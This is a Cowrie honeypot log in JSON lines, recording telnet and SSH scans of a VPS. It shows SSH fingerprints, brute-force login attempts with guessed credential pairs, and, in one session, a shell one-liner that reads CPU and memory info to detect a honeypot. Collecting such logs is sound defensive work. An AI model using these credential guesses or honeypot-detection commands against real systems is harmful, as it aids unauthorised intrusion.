{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55004,"dst_ip":"1.2.3.4","dst_port":23,"session":"85cc530e400b","protocol":"telnet","message":"New connection: 212.227.235.229:55004 (1.2.3.4:23) [session: 85cc530e400b]","sensor":"my-vps","timestamp":"2025-08-28T02:47:24.183915Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58180,"dst_ip":"1.2.3.4","dst_port":22,"session":"da35f2cc6def","protocol":"ssh","message":"New connection: 212.227.235.229:58180 (1.2.3.4:22) [session: da35f2cc6def]","sensor":"my-vps","timestamp":"2025-08-28T02:47:24.608277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:47:24.608932Z","src_ip":"212.227.235.229","session":"da35f2cc6def"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:47:24.713259Z","src_ip":"212.227.235.229","session":"da35f2cc6def"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-28T02:47:25.031790Z","src_ip":"212.227.235.229","session":"da35f2cc6def"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:26.139685Z","src_ip":"212.227.235.229","session":"da35f2cc6def"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"06398c051cd2","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: 06398c051cd2]","sensor":"my-vps","timestamp":"2025-08-28T02:47:37.587748Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:37.602410Z","src_ip":"196.251.114.29","session":"06398c051cd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60694,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2f7f9442a85","protocol":"telnet","message":"New connection: 212.227.235.229:60694 (1.2.3.4:23) [session: b2f7f9442a85]","sensor":"my-vps","timestamp":"2025-08-28T02:47:41.306377Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34672,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e475efcbfdc","protocol":"telnet","message":"New connection: 212.227.235.229:34672 (1.2.3.4:23) [session: 2e475efcbfdc]","sensor":"my-vps","timestamp":"2025-08-28T02:47:47.773894Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35142,"dst_ip":"1.2.3.4","dst_port":23,"session":"da07ae249a9a","protocol":"telnet","message":"New connection: 212.227.235.229:35142 (1.2.3.4:23) [session: da07ae249a9a]","sensor":"my-vps","timestamp":"2025-08-28T02:47:49.218403Z"}
{"eventid":"cowrie.session.closed","duration":32.722872257232666,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:55.882388Z","src_ip":"212.227.235.229","session":"4929502ad9ef"}
{"eventid":"cowrie.session.closed","duration":31.748467922210693,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:47:55.932309Z","src_ip":"212.227.235.229","session":"85cc530e400b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35282,"dst_ip":"1.2.3.4","dst_port":23,"session":"4694797e2ff2","protocol":"telnet","message":"New connection: 212.227.235.229:35282 (1.2.3.4:23) [session: 4694797e2ff2]","sensor":"my-vps","timestamp":"2025-08-28T02:47:56.808600Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39826,"dst_ip":"1.2.3.4","dst_port":23,"session":"957dc3c7ff33","protocol":"telnet","message":"New connection: 212.227.235.229:39826 (1.2.3.4:23) [session: 957dc3c7ff33]","sensor":"my-vps","timestamp":"2025-08-28T02:48:04.136547Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39978,"dst_ip":"1.2.3.4","dst_port":23,"session":"7c6db520555e","protocol":"telnet","message":"New connection: 212.227.235.229:39978 (1.2.3.4:23) [session: 7c6db520555e]","sensor":"my-vps","timestamp":"2025-08-28T02:48:05.681868Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39884,"dst_ip":"1.2.3.4","dst_port":23,"session":"340a16619a1c","protocol":"telnet","message":"New connection: 212.227.235.229:39884 (1.2.3.4:23) [session: 340a16619a1c]","sensor":"my-vps","timestamp":"2025-08-28T02:48:06.014170Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40044,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ed95bd55374","protocol":"telnet","message":"New connection: 212.227.235.229:40044 (1.2.3.4:23) [session: 7ed95bd55374]","sensor":"my-vps","timestamp":"2025-08-28T02:48:07.214442Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40594,"dst_ip":"1.2.3.4","dst_port":23,"session":"66b523c5f390","protocol":"telnet","message":"New connection: 212.227.235.229:40594 (1.2.3.4:23) [session: 66b523c5f390]","sensor":"my-vps","timestamp":"2025-08-28T02:48:10.357975Z"}
{"eventid":"cowrie.session.closed","duration":31.74546766281128,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:13.051757Z","src_ip":"212.227.235.229","session":"b2f7f9442a85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42876,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2d004c5cd88","protocol":"telnet","message":"New connection: 212.227.235.229:42876 (1.2.3.4:23) [session: b2d004c5cd88]","sensor":"my-vps","timestamp":"2025-08-28T02:48:15.493352Z"}
{"eventid":"cowrie.session.closed","duration":30.689069747924805,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:18.462906Z","src_ip":"212.227.235.229","session":"2e475efcbfdc"}
{"eventid":"cowrie.session.closed","duration":23.18910002708435,"message":"Connection lost after 23 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:19.997638Z","src_ip":"212.227.235.229","session":"4694797e2ff2"}
{"eventid":"cowrie.session.closed","duration":31.648847818374634,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:20.867150Z","src_ip":"212.227.235.229","session":"da07ae249a9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43178,"dst_ip":"1.2.3.4","dst_port":23,"session":"eee4a721cdb4","protocol":"telnet","message":"New connection: 212.227.235.229:43178 (1.2.3.4:23) [session: eee4a721cdb4]","sensor":"my-vps","timestamp":"2025-08-28T02:48:21.124709Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45004,"dst_ip":"1.2.3.4","dst_port":23,"session":"945bf4706a1f","protocol":"telnet","message":"New connection: 212.227.235.229:45004 (1.2.3.4:23) [session: 945bf4706a1f]","sensor":"my-vps","timestamp":"2025-08-28T02:48:21.465274Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45610,"dst_ip":"1.2.3.4","dst_port":23,"session":"449a47c36acc","protocol":"telnet","message":"New connection: 212.227.235.229:45610 (1.2.3.4:23) [session: 449a47c36acc]","sensor":"my-vps","timestamp":"2025-08-28T02:48:22.900363Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:26.813398Z","src_ip":"212.227.125.160","session":"f70289704a4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37484,"dst_ip":"1.2.3.4","dst_port":23,"session":"18b90cfbd65d","protocol":"telnet","message":"New connection: 212.227.235.229:37484 (1.2.3.4:23) [session: 18b90cfbd65d]","sensor":"my-vps","timestamp":"2025-08-28T02:48:29.846651Z"}
{"eventid":"cowrie.session.closed","duration":0.0014007091522216797,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:29.847979Z","src_ip":"212.227.235.229","session":"18b90cfbd65d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49676,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f9d59fa37b6","protocol":"telnet","message":"New connection: 212.227.235.229:49676 (1.2.3.4:23) [session: 5f9d59fa37b6]","sensor":"my-vps","timestamp":"2025-08-28T02:48:32.786863Z"}
{"eventid":"cowrie.session.closed","duration":31.644885063171387,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:37.326700Z","src_ip":"212.227.235.229","session":"7c6db520555e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51808,"dst_ip":"1.2.3.4","dst_port":23,"session":"6bbdb19617d0","protocol":"telnet","message":"New connection: 212.227.235.229:51808 (1.2.3.4:23) [session: 6bbdb19617d0]","sensor":"my-vps","timestamp":"2025-08-28T02:48:37.418470Z"}
{"eventid":"cowrie.session.closed","duration":31.829468965530396,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:37.843569Z","src_ip":"212.227.235.229","session":"340a16619a1c"}
{"eventid":"cowrie.session.closed","duration":33.742775440216064,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:37.879252Z","src_ip":"212.227.235.229","session":"957dc3c7ff33"}
{"eventid":"cowrie.session.closed","duration":31.45039939880371,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:38.664778Z","src_ip":"212.227.235.229","session":"7ed95bd55374"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52410,"dst_ip":"1.2.3.4","dst_port":23,"session":"d06c8ab5d90e","protocol":"telnet","message":"New connection: 212.227.235.229:52410 (1.2.3.4:23) [session: d06c8ab5d90e]","sensor":"my-vps","timestamp":"2025-08-28T02:48:41.591968Z"}
{"eventid":"cowrie.session.closed","duration":32.499839305877686,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:42.857748Z","src_ip":"212.227.235.229","session":"66b523c5f390"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53260,"dst_ip":"1.2.3.4","dst_port":23,"session":"813c5cf69aa6","protocol":"telnet","message":"New connection: 212.227.235.229:53260 (1.2.3.4:23) [session: 813c5cf69aa6]","sensor":"my-vps","timestamp":"2025-08-28T02:48:43.603102Z"}
{"eventid":"cowrie.session.closed","duration":31.186091899871826,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:46.679374Z","src_ip":"212.227.235.229","session":"b2d004c5cd88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56676,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c47e505710c","protocol":"telnet","message":"New connection: 212.227.235.229:56676 (1.2.3.4:23) [session: 2c47e505710c]","sensor":"my-vps","timestamp":"2025-08-28T02:48:51.037486Z"}
{"eventid":"cowrie.session.closed","duration":31.48382019996643,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:52.608421Z","src_ip":"212.227.235.229","session":"eee4a721cdb4"}
{"eventid":"cowrie.session.closed","duration":31.330406665802002,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:52.795574Z","src_ip":"212.227.235.229","session":"945bf4706a1f"}
{"eventid":"cowrie.session.closed","duration":33.39073467254639,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:48:56.291028Z","src_ip":"212.227.235.229","session":"449a47c36acc"}
{"eventid":"cowrie.session.closed","duration":34.504414796829224,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:07.291210Z","src_ip":"212.227.235.229","session":"5f9d59fa37b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34708,"dst_ip":"1.2.3.4","dst_port":23,"session":"335b2f5ebb74","protocol":"telnet","message":"New connection: 212.227.235.229:34708 (1.2.3.4:23) [session: 335b2f5ebb74]","sensor":"my-vps","timestamp":"2025-08-28T02:49:07.902975Z"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34846,"dst_ip":"1.2.3.4","dst_port":22,"session":"2849fcd85d39","protocol":"ssh","message":"New connection: 194.233.79.134:34846 (1.2.3.4:22) [session: 2849fcd85d39]","sensor":"my-vps","timestamp":"2025-08-28T02:49:08.460864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:49:08.817897Z","src_ip":"194.233.79.134","session":"2849fcd85d39"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:49:08.819405Z","src_ip":"194.233.79.134","session":"2849fcd85d39"}
{"eventid":"cowrie.session.closed","duration":31.72399067878723,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:09.142385Z","src_ip":"212.227.235.229","session":"6bbdb19617d0"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:49:11.312779Z","src_ip":"194.233.79.134","session":"2849fcd85d39"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:12.784057Z","src_ip":"194.233.79.134","session":"2849fcd85d39"}
{"eventid":"cowrie.session.closed","duration":31.695616006851196,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:13.287509Z","src_ip":"212.227.235.229","session":"d06c8ab5d90e"}
{"eventid":"cowrie.session.closed","duration":31.407166481018066,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:15.010166Z","src_ip":"212.227.235.229","session":"813c5cf69aa6"}
{"eventid":"cowrie.session.connect","src_ip":"173.212.245.48","src_port":44956,"dst_ip":"1.2.3.4","dst_port":22,"session":"84a724e86fb2","protocol":"ssh","message":"New connection: 173.212.245.48:44956 (1.2.3.4:22) [session: 84a724e86fb2]","sensor":"my-vps","timestamp":"2025-08-28T02:49:18.968741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:49:19.037628Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:49:19.038340Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.login.success","username":"root","password":"073018","message":"login attempt [root/073018] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:49:19.455753Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:49:19.815385Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T02:49:19.816811Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:19.948300Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:19.949634Z","src_ip":"173.212.245.48","session":"84a724e86fb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39694,"dst_ip":"1.2.3.4","dst_port":23,"session":"9d621a5f5556","protocol":"telnet","message":"New connection: 212.227.235.229:39694 (1.2.3.4:23) [session: 9d621a5f5556]","sensor":"my-vps","timestamp":"2025-08-28T02:49:21.104688Z"}
{"eventid":"cowrie.session.closed","duration":32.61549925804138,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:23.652912Z","src_ip":"212.227.235.229","session":"2c47e505710c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35506,"dst_ip":"1.2.3.4","dst_port":23,"session":"91c240ca6f93","protocol":"telnet","message":"New connection: 212.227.235.229:35506 (1.2.3.4:23) [session: 91c240ca6f93]","sensor":"my-vps","timestamp":"2025-08-28T02:49:24.147571Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42230,"dst_ip":"1.2.3.4","dst_port":23,"session":"09566e6760b3","protocol":"telnet","message":"New connection: 212.227.235.229:42230 (1.2.3.4:23) [session: 09566e6760b3]","sensor":"my-vps","timestamp":"2025-08-28T02:49:28.051237Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41890,"dst_ip":"1.2.3.4","dst_port":23,"session":"efe926314d26","protocol":"telnet","message":"New connection: 212.227.235.229:41890 (1.2.3.4:23) [session: efe926314d26]","sensor":"my-vps","timestamp":"2025-08-28T02:49:28.057008Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43084,"dst_ip":"1.2.3.4","dst_port":23,"session":"92c0704bc001","protocol":"telnet","message":"New connection: 212.227.235.229:43084 (1.2.3.4:23) [session: 92c0704bc001]","sensor":"my-vps","timestamp":"2025-08-28T02:49:31.724692Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:49:36.376772Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.377470Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.378105Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.379640Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.380563Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.381764Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.382854Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.383698Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.385159Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.386255Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.387248Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.577902Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.578981Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.session.closed","duration":"151.2","message":"Connection lost after 151.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:36.579912Z","src_ip":"31.214.172.54","session":"fe23576d1089"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44714,"dst_ip":"1.2.3.4","dst_port":23,"session":"03bcd90f8771","protocol":"telnet","message":"New connection: 212.227.235.229:44714 (1.2.3.4:23) [session: 03bcd90f8771]","sensor":"my-vps","timestamp":"2025-08-28T02:49:38.441840Z"}
{"eventid":"cowrie.session.closed","duration":32.28326678276062,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:40.186169Z","src_ip":"212.227.235.229","session":"335b2f5ebb74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48072,"dst_ip":"1.2.3.4","dst_port":23,"session":"b68f5edeb511","protocol":"telnet","message":"New connection: 212.227.235.229:48072 (1.2.3.4:23) [session: b68f5edeb511]","sensor":"my-vps","timestamp":"2025-08-28T02:49:45.936427Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46478,"dst_ip":"1.2.3.4","dst_port":23,"session":"62af402c49df","protocol":"telnet","message":"New connection: 212.227.235.229:46478 (1.2.3.4:23) [session: 62af402c49df]","sensor":"my-vps","timestamp":"2025-08-28T02:49:48.468119Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47566,"dst_ip":"1.2.3.4","dst_port":23,"session":"8814d40e612a","protocol":"telnet","message":"New connection: 212.227.235.229:47566 (1.2.3.4:23) [session: 8814d40e612a]","sensor":"my-vps","timestamp":"2025-08-28T02:49:51.026642Z"}
{"eventid":"cowrie.session.closed","duration":31.769569635391235,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:52.874186Z","src_ip":"212.227.235.229","session":"9d621a5f5556"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48492,"dst_ip":"1.2.3.4","dst_port":23,"session":"417abee09c33","protocol":"telnet","message":"New connection: 212.227.235.229:48492 (1.2.3.4:23) [session: 417abee09c33]","sensor":"my-vps","timestamp":"2025-08-28T02:49:54.192542Z"}
{"eventid":"cowrie.session.closed","duration":32.21852135658264,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:49:56.366022Z","src_ip":"212.227.235.229","session":"91c240ca6f93"}
